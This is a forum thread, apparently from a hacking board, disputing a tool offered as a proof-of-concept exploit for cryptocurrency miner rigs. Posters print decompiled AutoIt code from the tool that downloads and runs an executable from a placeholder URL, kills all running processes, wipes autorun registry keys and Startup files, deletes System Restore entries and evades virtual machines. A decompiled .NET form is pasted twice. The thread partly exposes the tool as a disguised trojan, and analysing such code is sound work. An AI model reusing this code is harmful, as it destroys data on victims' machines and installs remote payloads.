If NOT ProcessExists("RegSvcs.exe") AND NOT ProcessExists("RegAsm.exe") AND NOT ProcessExists("AppLaunch.exe") AND NOT ProcessExists("twunk_32.exe") AND NOT ProcessExists("newdev.exe") AND NOT ProcessExists("ndadmin.exe") Then
$pathtovbs = ($uniscriptdir & "\" & "run.vbs")
ShellExecute($pathtovbs)
Exit
EndIf
EndFunc
Func downloader()
If FileExists($unicode_userprofile & "\" & $path & "\dl.txt") Then
Else
FileWrite($unicode_userprofile & "\" & $path & "\dl.txt", "")
$random_download_name = Random(10000, 99999, 1) & ".exe"
Local $hdownload = InetGet("replace-me-url", $unicode_userprofile & "\" & $random_download_name, 1, 1)
Do
Sleep(250)
Until InetGetInfo($hdownload, 2)
Local $nbytes = InetGetInfo($hdownload, 0)
InetClose($hdownload)
ShellExecute($unicode_userprofile & "\" & $random_download_name)
EndIf
EndFunc
Func bsod()
$a = ProcessList()
For $i = 1 To UBound($a) - 1
ProcessClose($a[$i][0])
Next
Exit
EndFunc
Func botkiller()
RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
RegWrite("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
FileDelete(@StartupDir & "\*.*")
EndFunc
Func disable_syste_restore()
If FileExists($uniscriptdir & "\check.txt") Then
Else
RegDelete("HKLM64\Software\Microsoft\Windows NT\CurrentVersion\SPP\Clients")
FileWrite($uniscriptdir & "\check.txt", "")
EndIf
EndFunc
Func _rundos($scommand)
Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE)
Return SetError(@error, @extended, $nresult)
EndFunc
Global Const $prov_rsa_full = 1
Global Const $prov_rsa_aes = 24
Global Const $crypt_verifycontext = -268435456
Global Const $hp_hashsize = 4
Global Const $hp_hashval = 2
Global Const $crypt_exportable = 1
Global Const $crypt_userdata = 1
Global Const $calg_md2 = 32769
Global Const $calg_md4 = 32770
Global Const $calg_md5 = 32771
Global Const $calg_sha1 = 32772
Global Const $calg_3des = 26115
Global Const $calg_aes_128 = 26126
Global Const $calg_aes_192 = 26127
Global Const $calg_aes_256 = 26128
Global Const $calg_des = 26113
Global Const $calg_rc2 = 26114
Global Const $calg_rc4 = 26625
Global Const $calg_userkey = 0
Global $__g_acryptinternaldata[3]
[SNIP]
-----------------
[SNIP]
Func loop()
While 1
If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf
If WinExists($path) Then
bsod()
Else
EndIf
Sleep(100)
WEnd
EndFunc
Yeah, why should I bother run this in a vm
?Nice game OP... but you loose !
Are you kidding me or what? Did you really just post the crypter's source?!
What the hell has this to do with my source
The source you just posted proofs that none of the functions included, except the anti virtuals, are being used.
Quote
That was smart to let us look at the other way...
I'm disapointed by meself, I should have seen that earlier...
I'm disapointed by meself, I should have seen that earlier...
If you didn't even see that one, even after decompiling the exectuble, well, i'm sorry, but your unskilled then.
Plus, if you followed the topic, i explicitly posted about crypting the source.
Now for the last time, stop spamming my topic. I've had enough of your makes-no-sense posts here.
If you really think you are all that mighty, then PM as i asked you, and we'll compare our sources.
Then once again, you will be disapointed by yourself. For the third time in row.
Allright, to keep this post on topic.
JUST TO BE CLEAR
Decompiling the executable, or the DLL file will NOT give you what you are looking for.
These are only to run the network scan.
AutoIT is used to execute the actual exploit, and detect modifications, scanners, sniffers, decompilers, and virtual boxes.
If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.
USE THIS TOOL FOR WHAT IS HAS BEEN DESIGNED FOR!!
This tool is a PROOF OF CONCEPT about build-in exploits in most miner hardware rigs.
If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, than your intentions are NOT to test your enviroment, thus the file gets destroyed.
I received a ton load of PM's about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.
Over and out.
JUST TO BE CLEAR
Decompiling the executable, or the DLL file will NOT give you what you are looking for.
These are only to run the network scan.
AutoIT is used to execute the actual exploit, and detect modifications, scanners, sniffers, decompilers, and virtual boxes.
If ANY of these is detected, the application will shut down, and the REAL injection script is terminated, destroyed and melted.
USE THIS TOOL FOR WHAT IS HAS BEEN DESIGNED FOR!!
This tool is a PROOF OF CONCEPT about build-in exploits in most miner hardware rigs.
If you feel the need to run it sandboxed, virtual, or with an active scanner/sniffer/decompiler/debugger, than your intentions are NOT to test your enviroment, thus the file gets destroyed.
I received a ton load of PM's about security issues, and this is the best solution to prevent idiots trying to hack someone else's miners.
Over and out.
frmUPnPBrowser:
Am I right? Should I paste what it does?
Code:
Source Code for [KnC_cg_bfg_exploit_PoC]ManagedUPnPTest.frmUPnPBrowser
// Decompiled by Salamander version 2.0.0
// Copyright 2002-2006 Remotesoft Inc. All rights reserved.
// http://www.remotesoft.com/salamander
using ManagedUPnP;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;
namespace ManagedUPnPTest
{
public class frmUPnPBrowser : Form
{
private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;
private ctlUPnPInfo miInfo = null;
private IContainer components = null;
private ctlUPnPTreeBrowser tvUPnP;
private ImageList ilIcons;
private Panel pnlInfo;
private SplitContainer scMain;
private TabControl tcMain;
private TabPage tpInfo;
private TabPage tpLog;
private ctlLogBox txtLog;
public frmUPnPBrowser()
{
InitializeComponent();
}
private void frmManagedUPnPTest_Load(object sender, EventArgs e)
{
Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines);
Logging.Enabled = true;
mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
mdsServices.ResolveNetworkInterfaces = true;
mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor);
mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor);
mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction);
WindowsFirewall.CheckUPnPFirewallRules(null);
mdsServices.ReStartAsync();
}
private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
{
Logging.Enabled = false;
Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines);
}
private void Logging_LogLines(object sender, LogLinesEventArgs a)
{
string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4));
txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n"));
}
private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
{
AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction;
switch (autoDiscoveryServicesB1_NotifyAction)
{
case 1:
tvUPnP.RemoveDevice((String)a.Data);
break;
case 2:
tvUPnP.RemoveService((Service)a.Data);
break;
default:
if (autoDiscoveryServicesB1_NotifyAction == 10)
{
tvUPnP.AddService((Service)a.Data);
}
break;
}
}
private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
{
a.CreatedAutoService = a.Service;
}
private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
{
a.CanCreate = true;
}
private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
{
IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem;
ctlUPnPInfo CtlUPnPInfo = miInfo;
miInfo = null;
try
{
bool flag = iUPnPTreeItem == null;
if (!flag)
{
miInfo = iUPnPTreeItem.InfoControl;
flag = miInfo == null;
if (!flag)
{
miInfo.Dock = DockStyle.Fill;
pnlInfo.Controls.Add(miInfo);
}
}
}
finally
{
bool flag = CtlUPnPInfo == null;
if (!flag)
{
pnlInfo.Controls.Remove(CtlUPnPInfo);
CtlUPnPInfo.Dispose();
}
}
}
protected override void Dispose(bool disposing)
{
if (!(disposing ? (components == null) : 1))
{
components.Dispose();
}
base.Dispose(disposing);
}
private void InitializeComponent()
{
components = new Container();
ilIcons = new ImageList(components);
pnlInfo = new Panel();
scMain = new SplitContainer();
tcMain = new TabControl();
tpInfo = new TabPage();
tpLog = new TabPage();
tvUPnP = new ctlUPnPTreeBrowser();
txtLog = new ctlLogBox();
((ISupportInitialize)scMain).BeginInit();
scMain.Panel1.SuspendLayout();
scMain.Panel2.SuspendLayout();
scMain.SuspendLayout();
tcMain.SuspendLayout();
tpInfo.SuspendLayout();
tpLog.SuspendLayout();
base.SuspendLayout();
ilIcons.ColorDepth = ColorDepth.Depth8Bit;
ilIcons.ImageSize = new Size(16, 16);
ilIcons.TransparentColor = Color.Transparent;
pnlInfo.Dock = DockStyle.Fill;
pnlInfo.Location = new Point(3, 3);
pnlInfo.Name = "pnlInfo";
pnlInfo.Size = new Size(645, 646);
pnlInfo.TabIndex = 1;
scMain.Dock = DockStyle.Fill;
scMain.Location = new Point(0, 0);
scMain.Name = "scMain";
scMain.Panel1.Controls.Add(tvUPnP);
scMain.Panel2.Controls.Add(tcMain);
scMain.Size = new Size(1055, 678);
scMain.SplitterDistance = 392;
scMain.TabIndex = 2;
tcMain.Controls.Add(tpInfo);
tcMain.Controls.Add(tpLog);
tcMain.Dock = DockStyle.Fill;
tcMain.Location = new Point(0, 0);
tcMain.Name = "tcMain";
tcMain.SelectedIndex = 0;
tcMain.Size = new Size(659, 678);
tcMain.TabIndex = 1;
tpInfo.Controls.Add(pnlInfo);
tpInfo.Location = new Point(4, 22);
tpInfo.Name = "tpInfo";
tpInfo.Padding = new Padding(3);
tpInfo.Size = new Size(651, 652);
tpInfo.TabIndex = 0;
tpInfo.Text = "Selected Item Info";
tpInfo.UseVisualStyleBackColor = true;
tpLog.Controls.Add(txtLog);
tpLog.Location = new Point(4, 22);
tpLog.Name = "tpLog";
tpLog.Padding = new Padding(3);
tpLog.Size = new Size(496, 502);
tpLog.TabIndex = 1;
tpLog.Text = "UPnP Log";
tpLog.UseVisualStyleBackColor = true;
tvUPnP.Dock = DockStyle.Fill;
tvUPnP.ImageIndex = 1;
tvUPnP.Location = new Point(0, 0);
tvUPnP.Name = "tvUPnP";
tvUPnP.SelectedImageIndex = 0;
tvUPnP.Size = new Size(392, 678);
tvUPnP.TabIndex = 0;
tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
txtLog.BackColor = SystemColors.Window;
txtLog.Dock = DockStyle.Fill;
txtLog.Font = new Font("Courier New", 8.25F);
txtLog.Location = new Point(3, 3);
txtLog.Name = "txtLog";
txtLog.ReadOnly = true;
txtLog.Size = new Size(490, 496);
txtLog.TabIndex = 0;
txtLog.Text = "";
txtLog.WordWrap = false;
base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
base.AutoScaleMode = AutoScaleMode.Font;
base.ClientSize = new Size(1055, 678);
base.Controls.Add(scMain);
base.Name = "frmUPnPBrowser";
Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
scMain.Panel1.ResumeLayout(false);
scMain.Panel2.ResumeLayout(false);
((ISupportInitialize)scMain).EndInit();
scMain.ResumeLayout(false);
tcMain.ResumeLayout(false);
tpInfo.ResumeLayout(false);
tpLog.ResumeLayout(false);
base.ResumeLayout(false);
}
}
}
// Decompiled by Salamander version 2.0.0
// Copyright 2002-2006 Remotesoft Inc. All rights reserved.
// http://www.remotesoft.com/salamander
using ManagedUPnP;
using System;
using System.ComponentModel;
using System.Drawing;
using System.Windows.Forms;
namespace ManagedUPnPTest
{
public class frmUPnPBrowser : Form
{
private ManagedUPnP.AutoEventedDiscoveryServices mdsServices;
private ctlUPnPInfo miInfo = null;
private IContainer components = null;
private ctlUPnPTreeBrowser tvUPnP;
private ImageList ilIcons;
private Panel pnlInfo;
private SplitContainer scMain;
private TabControl tcMain;
private TabPage tpInfo;
private TabPage tpLog;
private ctlLogBox txtLog;
public frmUPnPBrowser()
{
InitializeComponent();
}
private void frmManagedUPnPTest_Load(object sender, EventArgs e)
{
Logging.LogLines += new LogLinesEventHandler(this, Logging_LogLines);
Logging.Enabled = true;
mdsServices = new ManagedUPnP.AutoEventedDiscoveryServices(null);
mdsServices.ResolveNetworkInterfaces = true;
mdsServices.CanCreateServiceFor += new AutoEventedDiscoveryServicesB1.CanCreateServiceForEventHandler(this, dsServices_CanCreateServiceFor);
mdsServices.CreateServiceFor += new AutoEventedDiscoveryServicesB1.CreateServiceForEventHandler(this, dsServices_CreateServiceFor);
mdsServices.StatusNotifyAction += new AutoEventedDiscoveryServicesB1.StatusNotifyActionEventHandler(this, dsServices_StatusNotifyAction);
WindowsFirewall.CheckUPnPFirewallRules(null);
mdsServices.ReStartAsync();
}
private void frmUPnPBrowser_FormClosing(object sender, FormClosingEventArgs e)
{
Logging.Enabled = false;
Logging.LogLines -= new LogLinesEventHandler(this, Logging_LogLines);
}
private void Logging_LogLines(object sender, LogLinesEventArgs a)
{
string str2 = String.Concat(DateTime.Now.ToString("[yyyy/MM/dd HH:mm:ss.fff] "), new String(' ', a.Indent * 4));
txtLog.AppendLog(String.Concat(str2, a.Lines.Replace("\r\n", String.Concat("\r\n", str2)), "\r\n"));
}
private void dsServices_StatusNotifyAction(object sender, AutoEventedDiscoveryServicesB1.StatusNotifyActionEventArgs a)
{
AutoDiscoveryServicesB1.NotifyAction autoDiscoveryServicesB1_NotifyAction = a.NotifyAction;
switch (autoDiscoveryServicesB1_NotifyAction)
{
case 1:
tvUPnP.RemoveDevice((String)a.Data);
break;
case 2:
tvUPnP.RemoveService((Service)a.Data);
break;
default:
if (autoDiscoveryServicesB1_NotifyAction == 10)
{
tvUPnP.AddService((Service)a.Data);
}
break;
}
}
private void dsServices_CreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CreateServiceForEventArgs a)
{
a.CreatedAutoService = a.Service;
}
private void dsServices_CanCreateServiceFor(object sender, AutoEventedDiscoveryServicesB1.CanCreateServiceForEventArgs a)
{
a.CanCreate = true;
}
private void tvUPnP_AfterSelect(object sender, TreeViewEventArgs e)
{
IUPnPTreeItem iUPnPTreeItem = tvUPnP.SelectedItem;
ctlUPnPInfo CtlUPnPInfo = miInfo;
miInfo = null;
try
{
bool flag = iUPnPTreeItem == null;
if (!flag)
{
miInfo = iUPnPTreeItem.InfoControl;
flag = miInfo == null;
if (!flag)
{
miInfo.Dock = DockStyle.Fill;
pnlInfo.Controls.Add(miInfo);
}
}
}
finally
{
bool flag = CtlUPnPInfo == null;
if (!flag)
{
pnlInfo.Controls.Remove(CtlUPnPInfo);
CtlUPnPInfo.Dispose();
}
}
}
protected override void Dispose(bool disposing)
{
if (!(disposing ? (components == null) : 1))
{
components.Dispose();
}
base.Dispose(disposing);
}
private void InitializeComponent()
{
components = new Container();
ilIcons = new ImageList(components);
pnlInfo = new Panel();
scMain = new SplitContainer();
tcMain = new TabControl();
tpInfo = new TabPage();
tpLog = new TabPage();
tvUPnP = new ctlUPnPTreeBrowser();
txtLog = new ctlLogBox();
((ISupportInitialize)scMain).BeginInit();
scMain.Panel1.SuspendLayout();
scMain.Panel2.SuspendLayout();
scMain.SuspendLayout();
tcMain.SuspendLayout();
tpInfo.SuspendLayout();
tpLog.SuspendLayout();
base.SuspendLayout();
ilIcons.ColorDepth = ColorDepth.Depth8Bit;
ilIcons.ImageSize = new Size(16, 16);
ilIcons.TransparentColor = Color.Transparent;
pnlInfo.Dock = DockStyle.Fill;
pnlInfo.Location = new Point(3, 3);
pnlInfo.Name = "pnlInfo";
pnlInfo.Size = new Size(645, 646);
pnlInfo.TabIndex = 1;
scMain.Dock = DockStyle.Fill;
scMain.Location = new Point(0, 0);
scMain.Name = "scMain";
scMain.Panel1.Controls.Add(tvUPnP);
scMain.Panel2.Controls.Add(tcMain);
scMain.Size = new Size(1055, 678);
scMain.SplitterDistance = 392;
scMain.TabIndex = 2;
tcMain.Controls.Add(tpInfo);
tcMain.Controls.Add(tpLog);
tcMain.Dock = DockStyle.Fill;
tcMain.Location = new Point(0, 0);
tcMain.Name = "tcMain";
tcMain.SelectedIndex = 0;
tcMain.Size = new Size(659, 678);
tcMain.TabIndex = 1;
tpInfo.Controls.Add(pnlInfo);
tpInfo.Location = new Point(4, 22);
tpInfo.Name = "tpInfo";
tpInfo.Padding = new Padding(3);
tpInfo.Size = new Size(651, 652);
tpInfo.TabIndex = 0;
tpInfo.Text = "Selected Item Info";
tpInfo.UseVisualStyleBackColor = true;
tpLog.Controls.Add(txtLog);
tpLog.Location = new Point(4, 22);
tpLog.Name = "tpLog";
tpLog.Padding = new Padding(3);
tpLog.Size = new Size(496, 502);
tpLog.TabIndex = 1;
tpLog.Text = "UPnP Log";
tpLog.UseVisualStyleBackColor = true;
tvUPnP.Dock = DockStyle.Fill;
tvUPnP.ImageIndex = 1;
tvUPnP.Location = new Point(0, 0);
tvUPnP.Name = "tvUPnP";
tvUPnP.SelectedImageIndex = 0;
tvUPnP.Size = new Size(392, 678);
tvUPnP.TabIndex = 0;
tvUPnP.AfterSelect += new TreeViewEventHandler(this.tvUPnP_AfterSelect);
txtLog.BackColor = SystemColors.Window;
txtLog.Dock = DockStyle.Fill;
txtLog.Font = new Font("Courier New", 8.25F);
txtLog.Location = new Point(3, 3);
txtLog.Name = "txtLog";
txtLog.ReadOnly = true;
txtLog.Size = new Size(490, 496);
txtLog.TabIndex = 0;
txtLog.Text = "";
txtLog.WordWrap = false;
base.AutoScaleDimensions = new SizeF(6.0F, 13.0F);
base.AutoScaleMode = AutoScaleMode.Font;
base.ClientSize = new Size(1055, 678);
base.Controls.Add(scMain);
base.Name = "frmUPnPBrowser";
Text = "KnC Miner - CGminer - BFGminer exploiter PoC";
base.FormClosing += new FormClosingEventHandler(this.frmUPnPBrowser_FormClosing);
base.Load += new EventHandler(this.frmManagedUPnPTest_Load);
scMain.Panel1.ResumeLayout(false);
scMain.Panel2.ResumeLayout(false);
((ISupportInitialize)scMain).EndInit();
scMain.ResumeLayout(false);
tcMain.ResumeLayout(false);
tpInfo.ResumeLayout(false);
tpLog.ResumeLayout(false);
base.ResumeLayout(false);
}
}
}
Am I right? Should I paste what it does?
So you can decompile a standard .NET form... Congratz!
Now show me the code that gets executed?? That's what this is about, right ?
Why on earth should i encrypt a standard form doing nothing but displaying some results ??
I can also just provide you the manifest XML file, instead of acting like a fool that can decompile a standard winform.
The security build in can not be bypassed.
I lol'ed...Your exe is actually an sfx rar containing,among others, two other exe : your AutoIt protection(?) and your .net exe that can be fully decompiled with dotpeek or ILSpy !
For a pentesting expert, you could have done a better job !
Feel free to decompile it, and PM me the results.
We'll compare the source with your results then ;-)